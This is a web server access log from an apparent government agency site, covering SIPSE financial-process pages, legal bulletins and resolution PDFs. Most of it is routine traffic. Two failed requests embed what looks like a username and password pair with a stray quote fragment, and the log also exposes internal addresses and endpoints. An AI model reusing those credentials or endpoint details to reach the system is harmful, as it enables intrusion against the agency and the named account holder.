179.33.124.25 - - [23/Mar/2024:23:07:08 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
179.33.124.25 - - [23/Mar/2024:23:07:09 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 48322
179.33.124.25 - - [23/Mar/2024:23:07:09 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:09 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:09 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:09 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:09 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:10 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1476
179.33.124.25 - - [23/Mar/2024:23:07:16 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 126193
179.33.124.25 - - [23/Mar/2024:23:07:17 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:17 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:17 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:17 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:17 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:17 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:17 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.1.61 - - [23/Mar/2024:23:07:25 -0500] "GET /reportes_sipse/sdg/ServletViabilidad?reporte=memo_viabilidad&solicitud=25286 HTTP/1.1" 200 1538
179.33.124.25 - - [23/Mar/2024:23:07:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 49442
179.33.124.25 - - [23/Mar/2024:23:07:27 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:27 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:27 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:27 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:27 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:27 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:27 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:27 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1460
179.33.124.25 - - [23/Mar/2024:23:07:27 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1460
179.33.124.25 - - [23/Mar/2024:23:07:30 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 38635
179.33.124.25 - - [23/Mar/2024:23:07:30 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1460
179.33.124.25 - - [23/Mar/2024:23:07:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 124405
179.33.124.25 - - [23/Mar/2024:23:07:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:37 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:38 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.1.61 - - [23/Mar/2024:23:07:46 -0500] "GET /reportes_sipse/sdg/ServletViabilidad?reporte=memo_viabilidad&solicitud=24757 HTTP/1.1" 200 1538
179.33.124.25 - - [23/Mar/2024:23:07:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:49 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:46 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 46372
179.33.124.25 - - [23/Mar/2024:23:07:49 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1440
179.33.124.25 - - [23/Mar/2024:23:07:50 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1440
179.33.124.25 - - [23/Mar/2024:23:07:51 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 35613
179.33.124.25 - - [23/Mar/2024:23:07:52 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1440
179.33.124.25 - - [23/Mar/2024:23:07:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 124310
179.33.124.25 - - [23/Mar/2024:23:07:59 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:59 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:59 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:59 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:07:59 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.2.4 - - [23/Mar/2024:23:06:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.1.61 - - [23/Mar/2024:23:08:03 -0500] "GET /reportes_sipse/sdg/ServletViabilidad?reporte=memo_viabilidad&solicitud=24705 HTTP/1.1" 200 1538
179.33.124.25 - - [23/Mar/2024:23:08:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 43428
179.33.124.25 - - [23/Mar/2024:23:08:06 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:06 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:06 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:06 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:06 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:06 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:06 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1420
179.33.124.25 - - [23/Mar/2024:23:08:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1424
172.22.2.4 - - [23/Mar/2024:23:06:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
179.33.124.25 - - [23/Mar/2024:23:08:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 124389
179.33.124.25 - - [23/Mar/2024:23:08:12 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:12 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:12 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:12 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:12 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.1.61 - - [23/Mar/2024:23:08:17 -0500] "GET /reportes_sipse/sdg/ServletViabilidad?reporte=memo_viabilidad&solicitud=24758 HTTP/1.1" 200 1538
179.33.124.25 - - [23/Mar/2024:23:08:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:19 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:17 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 40310
179.33.124.25 - - [23/Mar/2024:23:08:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1400
179.33.124.25 - - [23/Mar/2024:23:08:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1396
179.33.124.25 - - [23/Mar/2024:23:08:23 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 124484
172.22.2.4 - - [23/Mar/2024:23:06:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
179.33.124.25 - - [23/Mar/2024:23:08:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:24 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:24 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:25 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
114.119.132.238 - - [23/Mar/2024:23:08:27 -0500] "GET /galeria/galeria/fotos/GuaymaralTorca4G.jpg HTTP/1.1" 200 373786
172.22.1.61 - - [23/Mar/2024:23:08:30 -0500] "GET /reportes_sipse/sdg/ServletViabilidad?reporte=memo_viabilidad&solicitud=24759 HTTP/1.1" 200 1538
179.33.124.25 - - [23/Mar/2024:23:08:30 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 36916
179.33.124.25 - - [23/Mar/2024:23:08:32 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:32 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:32 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:32 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:32 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:32 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:32 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.33.124.25 - - [23/Mar/2024:23:08:33 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1376
179.33.124.25 - - [23/Mar/2024:23:08:33 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1384
172.22.2.4 - - [23/Mar/2024:23:06:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 27863
172.22.2.4 - - [23/Mar/2024:23:07:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 27429
172.22.2.4 - - [23/Mar/2024:23:07:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [23/Mar/2024:23:07:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [23/Mar/2024:23:09:05 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [23/Mar/2024:23:07:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 27429
172.22.2.4 - - [23/Mar/2024:23:07:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 25720
172.22.2.4 - - [23/Mar/2024:23:07:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 25357
172.22.2.4 - - [23/Mar/2024:23:08:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 28257
52.15.147.27 - - [23/Mar/2024:23:09:48 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [23/Mar/2024:23:08:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 28257
172.22.2.4 - - [23/Mar/2024:23:08:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.135.199 - - [23/Mar/2024:23:10:07 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/AUTOS%2B2020/&sort=date&order=asc HTTP/1.1" 200 14353
207.46.13.153 - - [23/Mar/2024:23:10:08 -0500] "GET /portaldeninos/aula-ambiental-artistica-itinerante-auambari/ HTTP/1.1" 200 89306
172.22.2.4 - - [23/Mar/2024:23:08:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32754
172.22.2.4 - - [23/Mar/2024:23:08:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 33440
172.22.2.4 - - [23/Mar/2024:23:08:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32271
172.22.2.4 - - [23/Mar/2024:23:09:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 30276
201.245.192.253 - - [23/Mar/2024:23:10:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39660
172.22.2.4 - - [23/Mar/2024:23:09:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.21 - - [23/Mar/2024:23:11:45 -0500] "GET /BLA/resoluciones/AUTOS%202011/5059.pdf HTTP/1.1" 200 170774
172.22.2.4 - - [23/Mar/2024:23:10:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36513
172.22.2.4 - - [23/Mar/2024:23:10:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
180.163.29.206 - - [23/Mar/2024:23:12:24 -0500] "GET /appsia/controlador:wilfredo.cruz:Emergencias03'A=0 HTTP/1.1" 404 68
172.22.2.4 - - [23/Mar/2024:23:10:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [23/Mar/2024:23:10:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 43032
172.22.2.4 - - [23/Mar/2024:23:11:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50303
216.245.221.92 - - [23/Mar/2024:23:14:05 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [23/Mar/2024:23:14:49 -0500] "GET /robots.txt HTTP/1.1" 404 1018
52.167.144.181 - - [23/Mar/2024:23:15:07 -0500] "GET /portaldeninos/wp-content/uploads/2020/11/Jaboque-B-300x169.jpg HTTP/1.1" 200 15474
172.22.2.4 - - [23/Mar/2024:23:14:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [23/Mar/2024:23:15:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39660
186.85.234.113 - - [23/Mar/2024:23:16:04 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 62578
186.85.234.113 - - [23/Mar/2024:23:16:04 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.85.234.113 - - [23/Mar/2024:23:16:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [23/Mar/2024:23:16:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [23/Mar/2024:23:16:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [23/Mar/2024:23:16:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [23/Mar/2024:23:16:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [23/Mar/2024:23:16:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
52.167.144.181 - - [23/Mar/2024:23:16:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1142.pdf HTTP/1.1" 200 1007915
186.85.234.113 - - [23/Mar/2024:23:16:08 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/expedirExperienciaIdoneidad.xhtml HTTP/1.1" 200 5672
186.85.234.113 - - [23/Mar/2024:23:16:37 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/expedirExperienciaIdoneidad.xhtml HTTP/1.1" 200 137294
186.85.234.113 - - [23/Mar/2024:23:16:38 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.85.234.113 - - [23/Mar/2024:23:16:38 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [23/Mar/2024:23:16:38 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [23/Mar/2024:23:16:38 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [23/Mar/2024:23:16:38 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [23/Mar/2024:23:16:38 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [23/Mar/2024:23:16:38 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.2.4 - - [23/Mar/2024:23:15:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
168.119.48.175 - - [23/Mar/2024:23:16:56 -0500] "GET / HTTP/1.1" 200 4720
186.85.234.113 - - [23/Mar/2024:23:16:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5614
186.85.234.113 - - [23/Mar/2024:23:17:15 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5610
172.22.2.4 - - [23/Mar/2024:23:17:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
201.245.192.253 - - [23/Mar/2024:23:18:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39819
201.245.192.253 - - [23/Mar/2024:23:18:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38313
216.245.221.92 - - [23/Mar/2024:23:19:05 -0500] "HEAD / HTTP/1.1" 200 -
186.85.234.113 - - [23/Mar/2024:23:19:21 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5614
201.245.192.253 - - [23/Mar/2024:23:19:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39825
201.245.192.253 - - [23/Mar/2024:23:20:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38313
201.245.192.253 - - [23/Mar/2024:23:20:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39660
172.22.2.4 - - [23/Mar/2024:23:20:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.54 - - [23/Mar/2024:23:22:03 -0500] "GET /robots.txt HTTP/1.1" 404 1034
157.55.39.54 - - [23/Mar/2024:23:22:15 -0500] "GET /conoce-las-medidas-de-prevencion-y-mitigacion-contempladas-en-la-alerta-fase-1-por-calidad-del-aire.html HTTP/1.1" 200 917
172.22.2.4 - - [23/Mar/2024:23:20:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
66.249.66.19 - - [23/Mar/2024:23:23:05 -0500] "GET /resoluciones/RESOLUCIONES%202008/1521.pdf HTTP/1.1" 404 1018
216.245.221.92 - - [23/Mar/2024:23:24:05 -0500] "HEAD / HTTP/1.1" 200 -
180.163.29.212 - - [23/Mar/2024:23:24:30 -0500] "GET /appsia/controlador:wilfredo.cruz:Emergencias03'A=0 HTTP/1.1" 404 68
201.245.192.253 - - [23/Mar/2024:23:25:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39660
186.85.234.113 - - [23/Mar/2024:23:26:13 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 44972
186.85.234.113 - - [23/Mar/2024:23:26:14 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.85.234.113 - - [23/Mar/2024:23:26:14 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.85.234.113 - - [23/Mar/2024:23:26:14 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
